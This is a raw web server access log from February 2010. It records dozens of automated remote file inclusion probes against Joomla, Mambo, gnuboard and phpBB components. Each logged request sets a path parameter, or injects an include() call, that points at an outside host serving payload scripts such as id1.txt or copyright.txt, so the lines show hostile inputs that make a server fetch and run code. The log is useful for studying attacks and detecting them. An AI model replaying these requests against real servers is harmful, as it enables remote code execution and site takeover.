87.106.134.174 - - [12/Feb/2010:06:27:57 -0800] "GET /logs/access_100203.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:27:58 -0800] "GET /logs/access_100208.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:00 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:00 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:01 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:06:28:02 -0800] "GET /logs/access_100123.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:02 -0800] "GET /logs/access_100208.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:28:14 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:28:14 -0800] "GET /logs/access_100127.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:28:14 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.99.44.89 - - [12/Feb/2010:06:28:17 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://epc.stut.edu.tw///uploads/tadgallery/medium/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.72.86 - - [12/Feb/2010:06:28:18 -0800] "GET /logs/access_100124.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:59 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:28:59 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:29:00 -0800] "GET /logs/access_100126.log//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:29:36 -0800] "GET /logs/access_100124.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:29:36 -0800] "GET /logs////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:29:37 -0800] "GET ///administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:29:42 -0800] "GET /logs/access_100127.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:30:36 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:30:36 -0800] "GET /logs/access_100103.log%20%20//components/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:30:40 -0800] "GET /logs/access_100203.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:06:30:41 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:31:05 -0800] "GET /logs/access_100109.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.219.195.66 - - [12/Feb/2010:06:31:05 -0800] "GET /logs/access_100121.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:31:06 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:31:06 -0800] "GET /logs/access_100109.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:31:06 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:31:07 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:32:59 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:32:59 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:33:00 -0800] "GET /logs/access_100119.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.24.246 - - [12/Feb/2010:06:33:04 -0800] "GET /logs/access_100126.log%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://fritjazz.com/administrator/images/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.234.38.66 - - [12/Feb/2010:06:34:08 -0800] "GET /logs/access_100121.log%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.234.38.66 - - [12/Feb/2010:06:34:08 -0800] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.234.38.66 - - [12/Feb/2010:06:34:09 -0800] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:34:23 -0800] "GET /logs/access_100111.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:34:46 -0800] "GET /logs/access_100114.log%20%20////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:34:59 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:34:59 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:35:42 -0800] "GET /logs/access_100130.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:35:48 -0800] "GET /write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:35:49 -0800] "GET /logs//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.234.38.66 - - [12/Feb/2010:06:35:49 -0800] "GET /logs/access_100109.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.234.38.66 - - [12/Feb/2010:06:35:49 -0800] "GET /logs/access_100121.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:35:49 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:36:01 -0800] "GET /logs/access_100124.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:36:01 -0800] "GET /logs/access_100127.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:06:36:26 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:06:36:26 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
110.45.146.50 - - [12/Feb/2010:06:37:06 -0800] "GET /logs/access_100131.log%20%20//write_comment_update.php?board_skin_path=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:39:53 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:39:54 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:39:58 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:39:59 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:39:59 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:40:01 -0800] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:40:41 -0800] "GET /logs/access_100131.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:40:41 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:40:41 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:40:51 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:40:58 -0800] "GET /logs/access_100131.log//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:41:01 -0800] "GET /logs//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:41:03 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [12/Feb/2010:06:41:04 -0800] "GET /logs/access_100131.log%20%20//components/com_performs/performs.php?mosConfig_absolute_path=http://www.lumartop.com/bbs/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:42:59 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:43:01 -0800] "GET /logs/access_100109.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.17.139.19 - - [12/Feb/2010:06:43:01 -0800] "GET /logs/access_100121.log/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://hl0lhq.karl.or.kr/lhqboard/icon/member_image_box/3/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:43:03 -0800] "GET /logs/access_100107.log%20%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.231.1.142 - - [12/Feb/2010:06:43:34 -0800] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig.live_site=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:44:46 -0800] "GET /logs/access_100126.log%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:44:46 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
198.173.4.70 - - [12/Feb/2010:06:44:46 -0800] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute_path=http://www.nopaste.pl/Source/eq1.txt?&mode=id HTTP/1.1" 404 5258 "-" "-" "www.puaga.com"
88.80.214.147 - - [12/Feb/2010:06:46:40 -0800] "GET /logs/access.log////administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:46:52 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:46:52 -0800] "GET /logs/access_100201.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:46:52 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:47:00 -0800] "GET /bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:47:00 -0800] "GET /logs//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:47:00 -0800] "GET /logs/access_100201.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:47:12 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.239.23.19 - - [12/Feb/2010:06:47:17 -0800] "GET /logs/access_100202.log%20%20//bbs/write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:06:50:59 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:06:50:59 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:06:50:59 -0800] "GET /logs/access_100125.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:06:51:00 -0800] "GET /?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:06:51:38 -0800] "GET /logs/access_100121.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:06:51:38 -0800] "GET /?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:06:51:38 -0800] "GET /logs//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:06:51:39 -0800] "GET /logs/access_100125.log%20%20//?_REQUEST=&_REQUEST[option]=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:06:52:08 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:06:52:08 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:12 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:12 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:21 -0800] "GET /bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:21 -0800] "GET /logs//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:22 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.91.138 - - [12/Feb/2010:06:52:45 -0800] "GET /logs/access.log%20%20//bbs/write_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??%20? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:02 -0800] "GET /logs/access_100103.log%20%20/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [12/Feb/2010:06:53:02 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.kloeppen-stube.de//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
